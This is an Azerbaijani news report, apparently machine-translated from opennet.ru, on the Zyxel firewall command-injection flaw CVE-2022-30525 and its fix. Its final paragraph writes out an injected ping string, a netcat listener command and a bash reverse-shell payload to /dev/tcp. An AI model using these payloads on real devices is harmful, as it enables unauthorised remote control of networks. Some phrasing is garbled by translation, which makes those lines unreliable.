Müəssisələrdə firewall, IDS və VPN-nin işini təşkil etmək üçün nəzərdə tutulmuş ATP, VPN və USG FLEX seriyalı Zyxel cihazlarında kritik zəiflik (CVE-2022-30525) müəyyən edilib ki, bu da xarici təcavüzkarın proqramda kod icrasına imkan verir. autentifikasiya olmadan istifadəçi hüquqları olmayan cihaz. Hücum etmək üçün təcavüzkar HTTP/HTTPS protokolundan istifadə edərək cihaza sorğu göndərə bilməlidir. Zyxel ZLD 5.30 mikroproqram yeniləməsində zəifliyi aradan qaldırdı. Shodan xidmətinin məlumatına görə, hazırda qlobal şəbəkədə HTTP/HTTPS vasitəsilə sorğuları qəbul edən 16213 XNUMX potensial zəif cihaz var.
Əməliyyat autentifikasiya olmadan əldə edilə bilən veb işləyici /ztp/cgi-bin/handler-ə xüsusi hazırlanmış əmrlər göndərməklə həyata keçirilir. Problem lib_wan_settings.py kitabxanasında istifadə edilən və setWanPortSt əməliyyatının işlənməsi zamanı yerinə yetirilən os.system çağırışından istifadə edərək sistemdə əmrləri yerinə yetirərkən sorğu parametrlərinin düzgün təmizlənməsinin olmaması ilə əlaqədardır.
Məsələn, təcavüzkar sətirdən keçə bilər “; ping 192.168.1.210;" sistemdə “ping 192.168.1.210” əmrinin yerinə yetirilməsinə gətirib çıxaracaq. Komanda qabığına giriş əldə etmək üçün sisteminizdə “nc -lvnp 1270” işə sala və sonra '; bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;'.
Mənbə: opennet.ru